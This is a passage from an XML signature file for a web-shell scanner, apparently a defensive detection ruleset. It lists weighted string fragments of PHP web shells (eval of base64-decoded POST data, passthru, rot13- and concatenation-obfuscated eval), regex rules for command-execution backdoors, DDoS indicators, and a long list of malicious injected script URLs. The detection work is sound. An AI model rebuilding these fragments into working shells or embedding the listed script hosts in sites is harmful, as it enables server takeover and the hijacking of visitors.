<STR>@oOo00o0OOo0o000000O($_GET["pass"]</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>AAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>'.getenv("HTTP_HOST").' - Antichat Shell</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>move_uploaded_file($userfile, "entrika.php");</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$curcmd = "cd ".$curdir.";".$curcmd</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>php passthru(getenv("HTTP_ACCEPT_LANGUAGE")); echo '</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>TDWGKJ3Ai1/BCtiO9grefEeAoU46gAwUDUuI4udXxGGoG</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>mailto:crazy_king@turkusev.net</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==</STR> <NUM>20</NUM> </ITEM> <ITEM> <STR>if (!empty($unset_surl)) {setcookie("c80sh_surl"); $surl = "";}</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>${'_'.$_}['_'](${'_'.$_}['__'])</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>$myurl='http://www.mianshamuma.com'</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>{chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$Remote_server = "http://cs.sff8.com/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>$Remote_server = "http://www.kmbczl.com/</STR> <NUM>70</NUM> </ITEM> <ITEM> <STR>Remote_server = base64_decode('aHR0cDovL2pzLmh0bTEuY2M=')</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>eval(@base64_decode($_POST</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>eval(base64_decode($_POST</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x' , 'e'.'v'.'al('.'$_'.'PO'.'ST</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x','e'.'v'.'al('.'$_'.'P'.'O'.'S'.'T</STR> <NUM>80</NUM> </ITEM> <ITEM> 
<STR>preg_replace('/'.'1'.'/'.'i'.'s'.'e'.'x','e'.'v'.'al('.'$_'.'PO'.'ST</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>preg_replace('/ad/e','@'.str_rot13('riny')</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>str_rot13('riny')</STR> <NUM>80</NUM> </ITEM> <RULE> <ITEM>[^\w](eval|assert|popen|proc_open|shell_exec|passthru|system|create_function)\(([^\(\)]*)STRipslashes\((\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]\)</ITEM> <ITEM>STRrev\(([^\(]*)edoced_46esab([^\(]*)\)</ITEM> <ITEM>fputs\(fopen\([^\(\)]*\),[^\(\)]*(\$_GET|\$_POST|\$_COOKIE|\$_SESSION|\$_REQUEST)\[(.{1,20})\]</ITEM> <ITEM>[^\>"](\$_GET|\$_POST)\[[^\(\)\{\}\[\]]{0,8}\]\((\$_GET|\$_POST)\[</ITEM> <ITEM>(?i)[^\w](eval|assert|popen|proc_open|shell_exec|passthru)\s*\(\\?(\$_GET|\$_COOKIE|\$_POST|\$_SESSION|\$_REQUEST)(\s*)\[(\s*.{1,20}\s*)\]([^\)]*)\)</ITEM> <ITEM>^gif89a</ITEM> <ITEM>(?i)[^\w]eval\(base64_decode\((\$_GET|\$_POST|\$_REQUEST)\[.{0,34}\]\)\)</ITEM> </RULE> </WEBSHELL> <INFORMATION> <ITEM> <STR>phpddos</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>socket_create(AF_INET, SOCK_STREAM, SOL_TCP)</STR> <NUM>10</NUM> </ITEM> <ITEM> <STR>www.phpddos.com</STR> <NUM>60</NUM> </ITEM> <ITEM> <STR>pfsockopen("tcp://</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>pfsockopen("udp://</STR> <NUM>30</NUM> </ITEM> <ITEM> <STR>fsockopen("udp://</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>buyer_nick</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>receiver_mobile</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>receiver_address</STR> <NUM>40</NUM> </ITEM> <ITEM> <STR>oybhacker</STR> <NUM>60</NUM> </ITEM> </INFORMATION> <SEO> <ITEM> <STR>.1188588.com/mb/js1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>1.81949.com/mb/images/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>23.245.198.139:88/files/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>255667.com/mb/public/css/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>51yes.com/click.aspx?id=214346876</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>767002.com/mb/images/style.css</STR> <NUM>80</NUM> 
</ITEM> <ITEM> <STR>http://geter.pw/mb/js.js</STR>
<NUM>80</NUM> </ITEM> <ITEM> <STR>http://gh5.710880.com/j.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://hy.168cnzz.com/cnl/j.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://hy.168cnzz.com/cnz/j.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://info.118tkw.net/hao/2014/new.gif</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://jc.dk90.com/game.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://jfpci.com/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.3bxc.com/h/h.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.3facai.com/js3.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.3facai.com/xm2.html</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.3facai.com/xm2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.3facai.com/ycx/ch.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.555hhh.com/4.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/116154252.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/15711966.js </STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/15711967.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/15885296.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16235822.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16666327.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16670068.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16688518.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16767843.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/16936002.js </STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/17138832.js </STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://js.users.51.la/1966.js </STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://liii.us/3.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://live.huangguan.co/qz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://ly.sinacnzz.com/qq/qq.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://ly.sinacnzz.com/yx/y.js</STR> 
<NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/22.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/3.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/b.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/m.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/mz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/ooppoo888.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/3/plc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/a/9.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/k/bb.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/k/offlinebcwr.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://mc.127.cc/tongji/k/offlinebcxa.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://money.ons72.com/liuhecai/js/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://n.xxtdata.com/js/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://n.xxtdata.com/js/v2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://ok.ko699.com/baidu/liu/key/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://oppoo.pw/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://price.un.zhuna.cn/room.gbk.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://qianlai.cc/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://se.52hijack.com/jc/out.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://se.52hijack.com/jc/outs.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://seo.no93.com/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://sm.49wl.com/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://static.aoosou.com/v1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://sy.e7q0.com/qq4923600/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://sy.e7q0.com/qq4923600/zs.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://syw.i11.cc/qq4923600/zs.js</STR> <NUM>80</NUM> </ITEM> <ITEM> 
<STR>http://t.1990seo.com/bc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.1990seo.com/mb/bc2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.cn/8FUS3lF</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.cn/8FmDqJk</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.cn/zRKYOXI</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.cn/zRxuwns</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://t.hz600.com/t.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://tz.yuedw.com/sy/6.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://url.cn/RJAXT4</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://v.4355v.info/a/main.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://v.ijsdata.com/js/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://v.ijsdata.com/js/v2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.0012888.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.001sx.com/tz/zqad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.0034888.com/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.068899.com/js/ad2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.077399.com/bctiaozhuan/zq2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.088456.com/muban/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.1188588.com/mb/js1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.118jf.com/cqad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.1233321.com/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.2267888.com/mb/js2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.255667.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.259ons.com/bai/azjs/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.282283.com/qq/qq.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.333233.com/tz/666.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.334335.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.400378.com/boc/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.400378.com/liuh/tz.js</STR> <NUM>80</NUM> 
</ITEM> <ITEM> <STR>http://www.4399555.com/xxt2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.45888888.com/cai/g.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.45888888.com/cai/l.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.494333.com/js/ad2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.502178.com/fa/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.502178.com/pan/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.502178.com/xh/tzadmin.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.5130555.com/js/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.54bao.com/okok808.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.552577.com/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.55567888.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.55html.com/lh/1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.55html.com/md/1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.55html.com/pf/10.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.56568.org/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.56970120.net:8081/mb/js/ad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.577d.com/x.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.598222.com/722700.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.59wu.com/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.64266.com/seo/asp.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.734333.com/js/ad2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.770138.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.777656.com/1/123.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.7956789.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.7bcpj.info/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.7bcpt.info/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.7pkw.info/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.7xjqp.com/51.la.js</STR> <NUM>80</NUM> 
</ITEM> <ITEM> <STR>http://www.7zryl.com/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.800281.com/bjl/zs.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.81949.com/ddm/lhc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.81949.com/ddm/lhc2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.81949.com/ddm/tyc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.81949.com/ddm/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.878388.com/js/ad2.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/0.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/520799.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/776600.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/d.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/ooppoo888.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/sjb.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/sjb1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/3/ym.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/9.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/bb.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/d.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/offlinebcwr.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/offlinebcxa.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888qx.com/smalltongji/k/onlinebckd.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.888888seo.com/seo/a.js</STR> <NUM>80</NUM> </ITEM> <ITEM> 
<STR>http://www.8kyule.com/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.91672.com/js/a1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.94v587.com/include/js/hz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.955947.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.980970.com/098h/qige.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.980970.com/qige/qige.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.988947.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.99u2.com/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.9shici.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.aa789.cc/456.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ake88.com/fc/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ake88.com/jr/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.aobo777.com/ad/t.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.aomenxinpujing.pw/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.aqqing.com/cpa/ons.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.aqqing.com/link/link.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bao-ship.com/tz/zqad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bbgfw.com/tz/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bbgfw.com/wbtz/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bbgfw.com/wstz/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bc333.info/a.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bcka.pw/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bclk.pw/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bcwz.pw/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bczxw.pw/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bet365bjl.pw/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bobaopen.net/tongji/fckzx.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bobaopen.net/tongji/hgdedelx.js</STR> <NUM>80</NUM> 
</ITEM> <ITEM> <STR>http://www.bosidao.pw/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.bsjyulecheng.com/z/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.cc0777.com/mb/bc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.cc0777.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.cc0777.com/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.cfgsw.com/dl/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.com88888.com/408888.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.com88888.com/82888.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.com88888.com/89955.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.de88.net/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.dfmz123.com/cai/cai.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.dubaicai.com/tz/k.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.duyiba.org/js/bc1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.e23069.com/js1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.e23069.com/js1.js </STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.fa56888.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.fcssqw.com/cai/l.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.go0qle.com/zq.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.handanrcw.com/ii/uu/tz1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.handanrcw.com/tz1.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.hbyicheng.com/00448/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.hbyicheng.com/66671/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.huashi119.com/0401.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.huashi119.com/am.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.huashi119.com/dedecms.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.huashi119.com/hg.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.huashi119.com/lh.js</STR> <NUM>80</NUM> </ITEM> <ITEM> 
<STR>http://www.itsvo.com/jsbjle/tbjl.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.lezhongle.cc/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.lhc888666.com/fp-sc.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.nanbanzm.com/hm8z/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.nanbanzm.com/qw8z/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.novnov.com/js/six.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.sinacnzz.com/fc/c.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.sinacnzz.com/qq/qq.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.sjc9.com/js/jquery.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.smallsnews.com/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.t171.com/b8988/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.t171.com/w2w2/fcm.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.todubo.com/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ttbo777.info/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ttbo999.info/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ursec.net/index/aspcai/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ursec.net/index/aspliu/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ursec.net/index/aspzi/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ursec.net/index/phphe/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ursec.net/index/phpliao/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.vip-66.com/main/jquery.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.www6661222.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.www6661222.com/tj.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.xgscyd.com/facai/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.xinpaibcw.info/baidu.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.yibotianxia.com/adjs/2012ok.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.yifei.net/12.js</STR> <NUM>80</NUM> 
</ITEM> <ITEM> <STR>http://www.yifei.net/ming.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/cw/fzjf/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/cw/tz.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/k/ceshi/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/k/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/t/fzkm/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc345.com/t/tzad.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylc404.com/facai/l.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.ylg.pw/51.la.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.yundingyouhui.info/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.zubawang.com/niu/windy.gif</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://www.zxkh.net/kjs/top.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>ttwg.pw/mb/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.asp&host="&host_name&"&directory="&Branch_directory]]></STR> <NUM>80</NUM> </ITEM> <ITEM> <STR><![CDATA[type=index.php&host=".$host_name."&directory=".$Branch]]></STR> <NUM>80</NUM> </ITEM> <ITEM> <STR><![CDATA["&Branch_directory_11&"."&Branch_directory_12&"."&Branch_directory_13&"."&Branch_directory_14&"."&Branch_directory_15&"."&Branch_directory_16]]></STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>users.51.la/17138832.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>www.0057888.com/mb/images/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>www.cc0777.com/mb/images/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>www6661222.com/mb/images/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>zzelle.com/mb/public/css/style.css</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>http://zq.anylm.com/mb/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789</STR> <NUM>80</NUM> </ITEM> <ITEM> <STR>api.qipaiwu.net/js/js.js</STR> <NUM>80</NUM> </ITEM> <ITEM> 
